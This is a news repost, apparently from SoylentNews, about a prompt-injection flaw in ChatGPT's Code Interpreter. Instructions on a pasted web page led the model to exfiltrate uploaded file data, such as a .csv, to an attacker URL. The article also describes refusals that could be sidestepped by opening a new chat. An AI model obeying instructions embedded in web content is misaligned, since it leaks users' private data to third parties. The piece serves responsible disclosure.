Chatgpt's New Code Interpreter Has Giant Security Hole, Allows Hackers To Steal Your Data
Arthur T Knackerbracket has processed the following story:
ChatGPT's recently-added Code Interpreter makes writing Python code with AI much more powerful, because it actually writes the code and then runs it for you in a sandboxed environment. Unfortunately, this sandboxed environment, which is also used to handle any spreadsheets you want ChatGPT to analyze and chart, is wide open to prompt injection attacks that exfiltrate your data.
Using a ChatGPT Plus account, which is necessary to get the new features, I was able to reproduce the exploit, which was first reported on Twitter by security researcher Johann Rehberger. It involves pasting a third-party URL into the chat window and then watching as the bot interprets instructions on the web page the same way it would commands the user entered.
[...] I tried this prompt injection exploit and some variations on it several times over a few days. It worked a lot of the time, but not always. In some chat sessions, ChatGPT would refuse to load an external web page at all, but then would do so if I launched a new chat.
In other chat sessions, it would give a message saying that it's not allowed to transmit data from files this way. And in yet other sessions, the injection would work, but rather than transmitting the data directly to http://myserver.com/data.php?mydata=[DATA], it would provide a hyperlink in its response and I would need to click that link for the data to transmit.
I was also able to use the exploit after I'd uploaded a .csv file with important data in it to use for data analysis. So this vulnerability applies not only to code you're testing but also to spreadsheets you might want ChatGPT to use for charting or summarization.
[...] The problem is that, no matter how far-fetched it might seem, this is a security hole that shouldn't be there. ChatGPT should not follow instructions that it finds on a web page, but it does and has for a long time. We reported on ChatGPT prompt injection (via YouTube videos) back in May after Rehberger himself responsibly disclosed the issue to OpenAI in April. The ability to upload files and run code in ChatGPT Plus is new (recently out of beta) but the ability to inject prompts from a URL, video or a PDF is not.
Read more of this story at SoylentNews.